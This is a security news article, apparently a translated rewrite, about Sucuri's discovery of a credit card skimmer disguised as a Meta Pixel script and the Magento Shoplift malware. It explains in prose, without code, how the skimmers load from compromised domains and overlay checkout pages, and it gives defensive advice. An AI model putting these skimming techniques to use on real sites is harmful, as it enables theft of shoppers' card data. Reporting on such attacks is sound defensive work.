Experts in cybersecurity revealed the existence of a hacker - credit card skimmer, embedded in a fake Meta Pixel, aimed at bypassing detection.
The company Sucuri reports that malware infiltrates websites through tools that allow the insertion of custom code. These include additional WordPress components such as Simple Custom CSS and JS, as well as the "Miscellaneous Scripts" section in the Magento admin panel.
Read about: Russia: blames hackers for credit card theft
The analysis of the web security company, revealed a fake Meta Pixel monitoring script, which within contains elements similar to those of the official one. However, a more thorough analysis reveals a significant difference: the introduction of JavaScript code that substitutes references to "connect.facebook[.]net" with "b-connected[.]com".
While the first sector corresponds to an authentic function Pixel tracking, the domain used as a replacement serves the purpose of loading a malicious script ("fbevents.js"). This script detects whether a victim is on a purchase completion page and, if they are, triggers a deceptive overlay designed to steal their credit card details.
It is important to mention that "b-connected[.]com" is an official e-commerce site, which has been hacked in the past in order to introduce malicious code by hackers. Adding to this, the data submitted through the fake platform is passed on to another compromised website, "www.donjuguetes[.]es".
To avoid the risks, it is important to keep your websites up to date, regularly review your administrator accounts to confirm their validity and regularly renew your passwords.
It is crucial to strengthen security, as hackers often exploit weak links passwords and vulnerabilities of WordPress to infiltrate targeted websites. Their purpose is to set up fake administrators, who may then take further harmful actions, such as installing malicious backdoors.
See also: Crypto drainers exist on thousands of WordPress sites
"Credit card hackers typically search for specific keywords like 'checkout' or 'onepage', which means that hacker attacks may not be detected until the checkout page is fully loaded," Morrow said.
Since the shopping integration pages are configured using cookies and other elements, these scripts escape detection by the scanners. The only way to deal with malware is to check the source-code of the page or to monitor network traffic. These scripts are executed discreetly, remaining unnoticed in the browsing history.
Sucuri also reveals that websites created with WordPress and Magento are being targeted by a new malware, Magento Shoplift. Variants of Magento Shoplift were spotted spreading as of September 2023, increasing the need for security.
The attack process starts by embedding an undefined piece of code JavaScript to a legitimate JavaScript file. This initial step is responsible for starting the loading of a second script from jqueurystatics[.]com, using the secure WebSocket (WSS) connection. This second script is intended to facilitate credit card data mining and information theft, while posing as a script of Google Analytics.
"WordPress has become a colossus in the e-commerce sector, thanks to the inclusion of Woocommerce and other extensions that conveniently transform a WordPress site into a fully functional online store," said researcher Puja Srivastava.
See also: BidenCash: offers 1.9 million stolen credit cards for free
The popularity of WordPress makes them a prime target for attacks, with hacker adapt the MageCart malware for e-commerce, now targeting a wider range of content management platforms (CMS).
Source: thehackernews
